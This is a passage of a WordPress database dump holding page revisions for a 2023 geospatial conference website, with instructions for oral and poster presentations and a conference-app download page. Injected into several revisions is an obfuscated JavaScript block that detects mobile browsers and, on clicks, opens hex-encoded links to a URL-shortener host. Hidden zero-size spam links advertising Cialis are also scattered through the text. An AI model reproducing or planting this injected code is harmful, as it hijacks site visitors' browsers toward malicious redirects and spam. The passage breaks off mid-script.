_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Instructions for poster presentations','','inherit','closed','closed','','5132-revision-v1','','','2023-10-03 12:53:28','2023-10-03 12:53:28','',5132,'https://gsw2023.com/?p=5487',0,'revision','',0),
(5488,0,'2023-10-03 12:53:28','2023-10-03 12:53:28','<span style=\"font-size: 12pt;\"><strong>Preparing the presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare the presentation, please keep in mind that:</strong></span>\r\n\r\n All projectors can handle 16:9 aspect ratio (Extron scaler).\r\n The time slot for oral presentations varies from 18 to 22 min depending on decisions by the\r\nworkshop chairs on the session contents. To find the time available for your presentation, please\r\nlocate your session on the GSW2023 program and check the abstract of your session page.\r\n Please leave some 3-5 minutes of your time slot available for questions and time to switch to the\r\nnext presentation.\r\n The oral presentation will be accurately timed, so make sure you will finish nicely in time. The\r\nchair of the session <span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"http://www.cialisae.com/\">犀利士</a>\n</span>will stand up when you have 1 min left, and come standing next to you if you\r\ndo not finish in time.\r\n There is no official GSW 2023 presentation template, please use a template from your home\r\nuniversity / institution.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>At the GSW2023</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>The day of your presentation you should consider that:</strong></span>\r\n\r\n For a smooth progress of the session we ask the presenting author to be in the session room 15\r\nminutes before the session starts (not your own talk, but the session) and announce your\r\npresence to the local organizers in the room and the chairs of that session.\r\n Please bring a USB stick with your presentation (PowerPoint or PDF) and upload it before the\r\nsession starts on the PC available in the room of your session.\r\n In each session, a single conference PC is used for all presentations.\r\n The PC is a Windows <span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span>notebook, with the following software: Adobe Acrobat Reader, Microsoft\r\nPowerPoint, and VLC media player.\r\n If you are using video in your presentation, please check whether it correctly runs 15 minutes\r\nbefore the session starts.\r\n Presenters also have the possibility to use their own laptop for their presentation, if they want to\r\nuse that instead, e.g. for running software demos. Please check the laptop connection to the\r\nprojector 15 minutes before the session starts. All rooms offer three laptop connections: HDMI,\r\nVGA and mini DisplayPort (for Mac). Specific Mac-adapters are NOT available in the rooms and\r\nneed to be brought by yourself.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Further information</strong></span>\r\n\r\nPower usage (if you are preparing e.g. in a hotel): Note that in Egypt the mains have an AC voltage of 220 Volts, at\r\n50 Hz. The used power sockets are of types C and F. (grounded, also compatible with C and E, see\r\nlink:<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span> https://www.power-plugs-sockets.com/egypt/ . We will supply extension cords, but will not supply power\r\nplug adapters.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','INSTRUCTIONS FOR ORAL PRESENTATIONS','','inherit','closed','closed','','5139-revision-v1','','','2023-10-03 12:53:28','2023-10-03 12:53:28','',5139,'https://gsw2023.com/?p=5488',0,'revision','',0),
(5489,0,'2023-10-03 12:53:28','2023-10-03 12:53:28','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>﻿</span>You may now download the conf4me app and check the conference agenda, hotels, and speakers and stay in touch with important news.\r\n\r\n<button onclick=\"window.location.href=\'https://conference4me.psnc.pl/download/\';\">\r\n\r\n\r\nAfter downloading the app, select ISPRS Geospatial Week 2023\r\n\r\n<img src=\"https://gsw2023.com/wp-content/uploads/2023/08/QR-code-nposter2_Siavash_14May19-726x1024-1.jpg\" alt=\"\" width=\"365\" height=\"512\" class=\"alignnone size-full wp-image-5420\" />\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|n<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.goocialis.cc/\">犀利士</a>\n</span>ok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','DOWNLOAD THE GSW2023 APP','','inherit','closed','closed','','5417-revision-v1','','','2023-10-03 12:53:28','2023-10-03 12:53:28','',5417,'https://gsw2023.com/?p=5489',0,'revision','',0),
(5490,0,'2023-10-03 13:19:10','2023-10-03 13:19:10','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>﻿</span><img src=\"https://gsw2023.com/wp-content/uploads/2023/08/b69e5201-9176-43d7-b10e-476efe69ecf1.jpg\" alt=\"\" width=\"1250\" height=\"1500\" class=\"alignnone size-full wp-image-5433\" /><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 